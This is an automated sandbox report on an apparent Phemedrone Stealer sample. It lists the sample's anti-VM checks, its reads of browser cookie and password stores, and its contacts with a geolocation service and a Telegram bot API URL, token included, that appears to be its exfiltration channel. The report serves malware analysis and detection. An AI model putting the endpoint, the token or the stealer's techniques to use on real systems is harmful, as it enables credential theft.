                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: qqnal04.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: qqnal04.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: qqnal04.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: \mw\csharp\Phemedrone Stealer V2.3.2\Phemedrone-Stealer\obj\Release\system.pdb source: qqnal04.exe
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F10E73 pushad ; iretd 0_2_00007FF848F10F11
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F1794D push ebx; retf 0_2_00007FF848F1796A
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F10C88 push ebx; retf 0_2_00007FF848F10D0A
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F10C88 push es; retn 5F4Eh0_2_00007FF848F16327
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F100BD pushad ; iretd 0_2_00007FF848F100C1
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F180E5 push ebx; ret 0_2_00007FF848F1816A
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\qqnal04.exeMemory allocated: 2902A010000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeMemory allocated: 29043A90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599344Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599109Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598886Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598671Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598556Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598402Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598262Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598006Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeWindow / User API: threadDelayed 1703Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeWindow / User API: threadDelayed 1359Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -599891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -599781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -599672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -599562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -599453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -599344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -599109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -599000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -598886s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -598781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -598671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -598556s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -598402s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -598262s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -598140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 6172Thread sleep time: -598006s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 5512Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exe TID: 7164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599344Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599109Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598886Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598671Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598556Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598402Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598262Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 598006Jump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: qqnal04.exeBinary or memory string: VMware
                      Source: qqnal04.exeBinary or memory string: Hyper-V Video
                      Source: qqnal04.exeBinary or memory string: VMware Virtual
                      Source: qqnal04.exe, 00000000.00000002.2110061969.0000029044190000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeMemory allocated: page read and write | page guardJump to behavior

                      Language, Device and Operating System Detection

                      barindex
                      Source: Yara matchFile source: qqnal04.exe, type: SAMPLE
                      Source: C:\Users\user\Desktop\qqnal04.exeQueries volume information: C:\Users\user\Desktop\qqnal04.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: qqnal04.exe, 00000000.00000002.2110257867.00000290441BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903C016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2106933727.000002902BB04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903BCC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903BED6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903BAF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903BCF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: qqnal04.exe PID: 3008, type: MEMORYSTR
                      Source: Yara matchFile source: qqnal04.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.qqnal04.exe.29029cc0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2018774350.0000029029CC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: qqnal04.exe PID: 3008, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\qqnal04.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903C016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2106933727.000002902BB04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903BCC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903BED6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903BAF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2107964117.000002903BCF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: qqnal04.exe PID: 3008, type: MEMORYSTR
                      Source: Yara matchFile source: qqnal04.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.qqnal04.exe.29029cc0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2018774350.0000029029CC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: qqnal04.exe PID: 3008, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		241
                      Security Software Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Disable or Modify Tools                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                      Virtualization/Sandbox Evasion                      		Security Account Manager251
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Obfuscated Files or Information                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      System Network Configuration Discovery                      		SSHKeylogging14
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials123
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Download Video

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      qqnal04.exe44%VirustotalBrowse
                      qqnal04.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://get.geHj0%Avira URL Cloudsafe

                      Domains and IPs

                      Download Network PCAP: filteredfull

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      get.geojs.io
                      		172.67.70.233
                      		truefalse
                        		high
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocumentfalse
                            		high
                            https://get.geojs.io/v1/ip/geo.jsonfalse
                              		high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument0qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://get.geojs.io/v1/ip/geo.json)rootqqnal04.exefalse
                                  		high
                                  https://get.geHjqqnal04.exe, 00000000.00000002.2106933727.000002902BC76000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://get.geojs.ioqqnal04.exe, 00000000.00000002.2106933727.000002902BC7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.orgqqnal04.exe, 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org/botqqnal04.exefalse
                                        		high
                                        http://api.telegram.orgqqnal04.exe, 00000000.00000002.2106933727.000002902BB52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameqqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp, qqnal04.exe, 00000000.00000002.2106933727.000002902BBC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://get.geojs.ioqqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp, qqnal04.exe, 00000000.00000002.2106933727.000002902BBC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              149.154.167.220
                                              		api.telegram.orgUnited Kingdom
                                              		62041TELEGRAMRUfalse
                                              172.67.70.233
                                              		get.geojs.ioUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              General Information

                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1591799
                                              Start date and time:2025-01-15 13:33:05 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 2m 30s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:2
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:qqnal04.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@1/1@2/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 94%
                                              • Number of executed functions: 7
                                              • Number of non-executed functions: 1
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Stop behavior analysis, all processes terminated
                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              07:34:00API Interceptor19x Sleep call for process: qqnal04.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              149.154.167.220DESCRIPTION.exeGet hashmaliciousDarkCloudBrowse
                                                Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                  17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                    Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                          QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  172.67.70.233http://optimize-system-upgrades.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                    http://inform-customer-sale.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                      https://marketing-campaign-solution.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                        Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                          rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                            gCK3ozTL7Q.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                              system.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                upd.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                                  DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
